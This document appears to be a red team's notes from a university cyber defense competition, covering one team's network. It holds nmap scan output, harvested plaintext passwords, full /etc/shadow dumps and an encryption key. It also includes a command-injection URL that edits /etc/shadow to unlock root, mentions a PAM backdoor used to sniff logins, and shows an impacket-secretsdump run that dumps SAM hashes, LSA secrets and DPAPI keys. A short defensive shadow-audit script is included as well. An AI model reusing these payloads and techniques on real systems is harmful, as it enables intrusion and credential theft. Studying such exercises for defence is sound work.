Team Information

- Number: Team 5
- Name: dont hack me im sensitive
- IP Range: 64.5.53.0/24
- Domain: team5.isucdc.com
- Current Place: 3rd
- Red Teamer(s): None
Service Status
- AD LDAP
- AD RDP
- JD RDP
- LTV SSH
- NEWS SSH
- NEWS HTTP
- WSTN SSH
- WSTN MQTT
- WWW SSH
- WWW HTTP
Nmap
AD
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team5.isucdc.com0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TEAM5
| NetBIOS_Domain_Name: TEAM5
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: team5.isucdc.com
| DNS_Computer_Name: ad.team5.isucdc.com
| DNS_Tree_Name: team5.isucdc.com
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-04T15:12:12+00:00
| ssl-cert: Subject: commonName=ad.team5.isucdc.com
| Not valid before: 2025-09-05T01:19:34
|_Not valid after: 2026-03-07T01:19:34
|_ssl-date: 2025-10-04T15:12:20+00:00; -2s from scanner time.
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
LTV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NEWS
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 35:79:94:a9:8d:d5:06:f3:5b:b6:c7:31:79:62:de:08 (RSA)
| 256 95:a6:a9:0f:80:04:10:e4:8b:a0:0b:68:6b:39:07:e8 (ECDSA)
|_ 256 95:78:e1:ee:dc:0e:f6:2b:a3:0d:dd:aa:e0:8f:a7:cd (ED25519)
8080/tcp open http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Disposition: inline;filename=f.txt
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.650+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.607+00:00","status":404,"error":"Not Found","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.631+00:00","status":404,"error":"Not Found","path":"/"}
| RTSPRequest, Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| HTTP Status 400
| Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}HTTP Status 400
WSTN
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a:18:5d:f5:ed:78:64:cc:53:87:40:4b:b6:10:86:3a (RSA)
| 256 e4:74:12:60:41:a3:53:40:67:ee:ea:da:c5:42:e3:fd (ECDSA)
|_ 256 07:99:db:38:3a:fe:5a:ba:fc:5c:27:c9:ea:83:c3:c5 (ED25519)
1883/tcp open mqtt
|_mqtt-subscribe: Connection rejected: Not Authorized
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
WWW
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a0:6a:89:c7:a4:b1:37:23:2d:3a:a1:24:c3:76:10:06 (ECDSA)
|_ 256 a8:7c:35:3d:df:2b:92:07:2b:1e:c8:5a:8d:d3:7e:0f (ED25519)
80/tcp open http Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Notable Vulnerabilities
Uploaded Files:
red-team-flag
Team5 LoRA enc: AES-128-ECB, key: 0x9A, 0x21, 0xF3, 0x44, 0xC7, 0x0B, 0x5D, 0xEE, 0x18, 0x77, 0xA2, 0x6C, 0x03, 0x92, 0x51, 0xBF
cdc: cdccdc123
news:
2025-10-04_14:35:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_14:40:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_14:40:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_14:42:28 cdc, Db3f49.K)@;1|Mu, From: 199.100.16.101
2025-10-04_14:42:28 cdc, Db3f49.K)@;1|Mu, From: 199.100.16.101
2025-10-04_14:42:54 reset, tunnelsALLday, From: 12.110.177.46
2025-10-04_14:42:54 reset, tunnelsALLday, From: 12.110.177.46
www:
root@www:/var/log# cat toomanysecrets.log
2025-10-04_09:45:15 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_09:50:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_09:55:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_10:00:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_10:03:59 cdc, 7^tGo'13Sz{&, From: 192.168.1.3
2025-10-04_10:05:14 jennifer.smith, get709dec, From: 49.10.235.154
API was running as root
They disabled their root login by adding an "!" before the hash
```txt
root:!$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20330:0:99999:7:::
```
But it can be changed with the badly written API:
```txt
http://news.team5.isucdc.com:8080/weather/help?msg=sed%20-i%20s/root:!/root:/ /etc/shadow
```
to re-enable it.

Installed a PAM backdoor, sniffed the tina.bell login. Was able to ssh to each box with tina.bell and sudo su.
2025-10-04_14:35:14 tina.bell, fof000bex, From: 49.10.235.154
root@news:~# cat /etc/shadow
root:$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20330:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
cdc:$6$44MAueNW$OpzLuDVESXEBSBNS0oV3W1h3032NduEl3C2PoPmHJsX65tWq.P3h0x/9aVehzvxyNBqpmwKPoyMpRfKksGTMV/:20365:0:99999:7:::
mysql:!:20330:0:99999:7:::
sssd:*:20330:0:99999:7:::
postfix:*:20330:0:99999:7:::
ntp:*:20337:0:99999:7:::
recovery:$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20365:0:99999:7:::
reset:$6$IdlfM6ZL$xCGWKTlIduJ8GyNz/FwGIP7/CTPjHOk8qb6u7Uu.X/I5ydXdZSDki6v7iLnwINeYFmC.9XyMAQU77QWyf1lWM0:20365:0:99999:7:::
root@www:/home/tina.bell@team5.isucdc.com# cat /etc/shadow
root:!$y$j9T$xBfkrZNGKvv3ghAkfNQOm/$TtpTreDbhAOKSAMOfbYXdWgFRms9A/o0K1V4UHIzAP2:20325:0:99999:7:::
daemon:*:20325:0:99999:7:::
bin:*:20325:0:99999:7:::
sys:*:20325:0:99999:7:::
sync:*:20325:0:99999:7:::
games:*:20325:0:99999:7:::
man:*:20325:0:99999:7:::
lp:*:20325:0:99999:7:::
mail:*:20325:0:99999:7:::
news:*:20325:0:99999:7:::
uucp:*:20325:0:99999:7:::
proxy:*:20325:0:99999:7:::
www-data:*:20325:0:99999:7:::
backup:*:20325:0:99999:7:::
list:*:20325:0:99999:7:::
irc:*:20325:0:99999:7:::
_apt:*:20325:0:99999:7:::
nobody:*:20325:0:99999:7:::
systemd-network:!*:20325::::::
systemd-timesync:!*:20325::::::
messagebus:!:20325::::::
sshd:!:20325::::::
cdc:$y$j9T$L2vh4X8vJxWrTnpqlOUIe1$zrZId7Axo/n/0pHx.NM3FiKJwuE.4vIptFtCnbVX9.B:20365:0:99999:7:::
tcpdump:!:20330::::::
www:$y$j9T$6TU05NUc3OIyh99XJMqrf0$gjgiO/Kij3zUx/DYCo7QjmBDDjwkJjiRy8HYoHoHPl5:20333:0:99999:7:::
mysql:!:20336::::::
mosquitto:!:20336::::::
ntpsec:!:20337::::::
sssd:!:20337::::::
polkitd:!*:20337::::::
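A blue-team check for the shadow issues seen in the listings above, added here as an example and not part of the original notes: it flags accounts locked only by a "!" prefix with the hash still in place (the lock is a one-character edit for anything that can write /etc/shadow as root), accounts sharing an identical hash (as root and recovery do on news), and md5crypt (`$1$`) hashes. The function names and the sample entries are constructed for illustration.

```python
"""Audit /etc/shadow-style text for reversible locks, reused hashes, weak schemes."""
from collections import defaultdict

# Constructed sample with placeholder hashes (not values from the page).
SAMPLE_SHADOW = """\
root:!$1$EXAMPLESALT$ConstructedMd5cryptHashAAAA:20330:0:99999:7:::
daemon:*:17647:0:99999:7:::
mysql:!:20330:0:99999:7:::
svc:!*:20325::::::
recovery:$1$EXAMPLESALT$ConstructedMd5cryptHashAAAA:20365:0:99999:7:::
cdc:$y$j9T$ConstructedSalt$ConstructedYescryptHashBBBB:20365:0:99999:7:::
"""

# Deliberately narrow: only the scheme that appears in the listings.
WEAK_PREFIXES = {"$1$": "md5crypt"}


def parse_shadow(text):
    """Yield (user, locked, hash_or_None, raw_field) per well-formed line."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        raw = fields[1]
        locked = raw.startswith("!")
        body = raw.lstrip("!")
        # "*", "!" and "!*" carry no hash, so there is nothing to restore.
        pw_hash = body if body not in ("", "*") else None
        yield fields[0], locked, pw_hash, raw


def audit_shadow(text):
    """Return a list of (account(s), finding) tuples."""
    findings = []
    by_hash = defaultdict(list)
    for user, locked, pw_hash, raw in parse_shadow(text):
        if raw == "":
            # Empty field: the account has no password at all.
            findings.append((user, "empty-password"))
            continue
        if pw_hash is None:
            continue
        by_hash[pw_hash].append(user)
        if locked:
            # Stripping the "!" restores the old password unchanged.
            findings.append((user, "locked-but-hash-retained"))
        for prefix, name in WEAK_PREFIXES.items():
            if pw_hash.startswith(prefix):
                findings.append((user, f"weak-scheme:{name}"))
    for users in by_hash.values():
        if len(users) > 1:
            # Same salt and digest means a copied entry with the same password.
            findings.append((",".join(sorted(users)), "shared-hash"))
    return findings


if __name__ == "__main__":
    for who, what in audit_shadow(SAMPLE_SHADOW):
        print(f"{who}: {what}")
```

Replacing a locked account's field with a bare `!` or `*` leaves no hash to re-enable; it does not help if a service running as root can still be made to write the file.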
impacket-secretsdump tina.bell:fof000bex@127.0.0.1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM5\AD$:aes256-cts-hmac-sha1-96:601b15b497037b3c633dad9600ca54080d3ed9dc127d625be4c785365e234736
TEAM5\AD$:aes128-cts-hmac-sha1-96:4df201f1f4eb3245f4b83e8bb1b9ed6c
TEAM5\AD$:des-cbc-md5:a785b9b02f2cf840
TEAM5\AD$:plain_password_hex:c8d432351e1a629c9a2be7b835805c02106eb4d543c7a34d5546153530845bd9136d978f19d1d3198ee229f2fdd9f5bb1818d64bf50c709433bcf7ac4f9735fbb1e053e23a997b3ea26db3508e21caaef767ff9b3e652ff1260d5ba88ee463cf4e9a7533bdf96158c71e0f7f314ea95486cd9e086fdfd46c877753a2b208b0faf7eff8842562a2437bc3b992d6d7a96644e3da6fb32b6738551f97784c0fabc728127190672ef9c97e351d1adc793ee7b4168341b2d7ece9e1d8aa72e46906f3afb1f1bc85d0115e3099d3f44a6a55a02d9a9436f3b11ac1e53113ce6158d4b2862328d7c1487cf33a647b1914da3d4d
TEAM5\AD$:aad3b435b51404eeaad3b435b51404ee:06019b701b6c023bee3bd837fc671ec9:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: [Errno 111] Connection refused
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Notable Defenses
fail2ban
perl was made not executable?
Team Spirit Issues
Looks like they are permanently IP banning IP addresses...